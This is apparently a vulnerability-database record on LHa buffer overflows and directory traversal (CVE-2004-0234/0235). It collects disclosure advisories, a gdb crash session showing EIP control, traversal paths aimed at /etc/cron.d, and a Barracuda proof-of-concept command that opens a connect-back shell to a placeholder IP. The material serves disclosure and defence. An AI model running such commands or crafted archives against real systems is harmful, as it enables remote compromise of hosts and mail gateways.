Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. \n\nThese vulnerabilities are related to:\nSA11510\nSA19002\n\nSuccessful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n 1.17 (Linux binary)\n possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n. \n\nTITLE:\nZoo \"fullpath()\" File Name Handling Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA19002\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/19002/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nzoo 2.x\nhttp://secunia.com/product/8297/\n\nDESCRIPTION:\nJean-S\\xe9bastien Guay-Leroux has discovered a vulnerability in zoo,\nwhich can be exploited by malicious people to cause a DoS (Denial of\nService) and potentially to compromise a user\u0027s system. This can be exploited to cause a\nbuffer overflow when a specially-crafted ZOO archive containing a\nfile with an overly long file and directory name is processed (e.g. \nlisting archive contents or adding new files to the archive). \n\nThe vulnerability has been confirmed in version 2.10. Other versions\nmay also be affected. \n\nSOLUTION:\nRestrict use to trusted ZOO archives. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-S\\xe9bastien Guay-Leroux\n\nORIGINAL ADVISORY:\nhttp://www.guay-leroux.com/projects/zoo-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic: Barracuda LHA archiver security bug leads to\n remote compromise\n\nAnnounced: 2006-04-03\nProduct: Barracuda Spam Firewall\nVendor: http://www.barracudanetworks.com/\nImpact: Remote shell access\nAffected product: Barracuda with firmware \u003c 3.3.03.022 AND\n spamdef \u003c 3.0.10045\nCredits: Jean-S\\xe9bastien Guay-Leroux\nCVE ID: CVE-2004-0234\n\n\nI. BACKGROUND\n\nThe Barracuda Spam Firewall is an integrated hardware and software solution for\ncomplete protection of your email server. It provides a powerful, easy to use,\nand affordable solution to eliminating spam and virus from your organization by\nproviding the following protection:\n\n * Anti-spam\n * Anti-virus\n * Anti-spoofing\n * Anti-phishing\n * Anti-spyware (Attachments)\n * Denial of Service\n\n\nII. DESCRIPTION\n\nWhen building a special LHA archive with long filenames in it, it is possible to\noverflow a buffer on the stack used by the program and seize control of the\nprogram. \n\nSince this component is used when scanning an incoming email, remote compromise\nis possible by sending a simple email with the specially crafted LHA archive\nattached to the Barracuda Spam Firewall. \n\nYou do NOT need to have remote administration access (on port 8000) for\nsuccessfull exploitation. \n\nFor further informations about the details of the bugs, you can consult OSVDB\n#5753 and #5754 . \n\n\nIII. IMPACT\n\nGain shell access to the remote Barracuda Spam Firewall\n\n\nIV. PROOF OF CONCEPT\n\nUsing the PIRANA framework, available at http://www.guay-leroux.com , it is\npossible to test the Barracuda Spam Firewall against the LHA vulnerability. \n\nBy calling PIRANA the way it is described below, you will get a TCP connect back\nshell on IP address 1.2.3.4 and port 1234:\n\nperl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \\\n-p 1234 -z -c 1 -d 1\n\n\nV. SOLUTION\n\nBarracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,\navailable March 24th 2006. \n\nThey also published an official patch in firmware #3.3.03.022, available April\n3rd 2006. \n\nIt is recommended to update to firmware #3.3.03.022 . \n\n\nVI. CREDITS\n\nUlf Harnhammar who found the original LHA flaw. \n\nJean-S\\xe9bastien Guay-Leroux who conducted further research on the bug\nand produced exploitation plugin for the PIRANA framework. \n\n\nVII. REFERENCES\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234\n\n\nVIII. HISTORY\n\n2006-03-02 : Disclosure of vulnerability to Barracuda Networks\n2006-03-02 : Acknowledgement of the problem\n2006-03-24 : Problem fixed\n2006-04-03 : Advisory disclosed to public\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-8664",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0234",
"trust": 3.0
},
{
"db": "BID",
"id": "10243",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "5754",
"trust": 2.5
},
{
"db": "OSVDB",
"id": "5753",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1015866",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "19514",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-1220",
"trust": 1.7
},
{
"db": "XF",
"id": "16012",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20040502 LHA LOCAL STACK OVERFLOW PROOF OF CONCEPT CODE",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FEDORA-2004-119",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FLSA:1833",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:179",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:178",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060403 BARRACUDA LHA ARCHIVER SECURITY BUG LEADS TO REMOTE COMPROMISE",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:977",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:9881",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200405-02",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-515",
"trust": 0.6
},
{
"db": "CONECTIVA",
"id": "CLA-2004:840",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "33241",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-8664",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45159",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "19002",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "44104",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45164",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"id": "VAR-200408-0140",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:30:26.313000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LHA for UNIX Version 1.17",
"trust": 0.8,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://lha.sourceforge.jp/"
},
{
"title": "RHSA-2004:178",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"title": "RHSA-2004:179",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/rhsa-2004-179.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10243"
},
{
"trust": 2.5,
"url": "http://securitytracker.com/id?1015866"
},
{
"trust": 2.0,
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
},
{
"trust": 1.8,
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"trust": 1.7,
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020778.html"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"trust": 1.7,
"url": "http://www.guay-leroux.com/projects/barracuda-advisory-lha.txt"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/5753"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/5754"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/19514"
},
{
"trust": 1.6,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2006/1220"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16012"
},
{
"trust": 1.4,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:977"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a977"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9881"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/1220"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0234"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0234"
},
{
"trust": 0.8,
"url": "http://osvdb.org/5753"
},
{
"trust": 0.8,
"url": "http://osvdb.org/5754"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9881"
},
{
"trust": 0.4,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"trust": 0.3,
"url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
},
{
"trust": 0.3,
"url": "http://www.stalker.com/cgpmcafee/"
},
{
"trust": 0.3,
"url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
},
{
"trust": 0.3,
"url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
},
{
"trust": 0.3,
"url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
},
{
"trust": 0.3,
"url": "http://www.rarsoft.com/"
},
{
"trust": 0.3,
"url": "http://www.winzip.com/"
},
{
"trust": 0.3,
"url": "/archive/1/366265"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/19002/"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044875.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4639/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/19514/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044874.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/11510/"
},
{
"trust": 0.1,
"url": "http://shellcode.org/audit/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
},
{
"trust": 0.1,
"url": "http://idiosynkratisk.tk/"
},
{
"trust": 0.1,
"url": "http://www.advogato.org/person/metaur/"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8297/"
},
{
"trust": 0.1,
"url": "http://www.guay-leroux.com/projects/zoo-advisory.txt"
},
{
"trust": 0.1,
"url": "http://www.barracudanetworks.com/"
},
{
"trust": 0.1,
"url": "http://www.guay-leroux.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-08-18T00:00:00",
"db": "VULHUB",
"id": "VHN-8664"
},
{
"date": "2004-04-30T00:00:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"date": "2006-04-04T19:25:51",
"db": "PACKETSTORM",
"id": "45159"
},
{
"date": "2004-05-04T04:25:06",
"db": "PACKETSTORM",
"id": "33241"
},
{
"date": "2006-02-25T00:55:07",
"db": "PACKETSTORM",
"id": "44104"
},
{
"date": "2006-04-04T19:39:53",
"db": "PACKETSTORM",
"id": "45164"
},
{
"date": "2004-08-18T04:00:00",
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"date": "2004-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8664"
},
{
"date": "2009-07-12T04:07:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"date": "2017-10-11T01:29:24.730000",
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"date": "2007-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LHa Vuffer Overflow Vulnerability in Testing and Extracting Process",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.6
}
}
var-200408-0141
Vulnerability from variot
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path"). The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)
- DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.
- OVERVIEW *
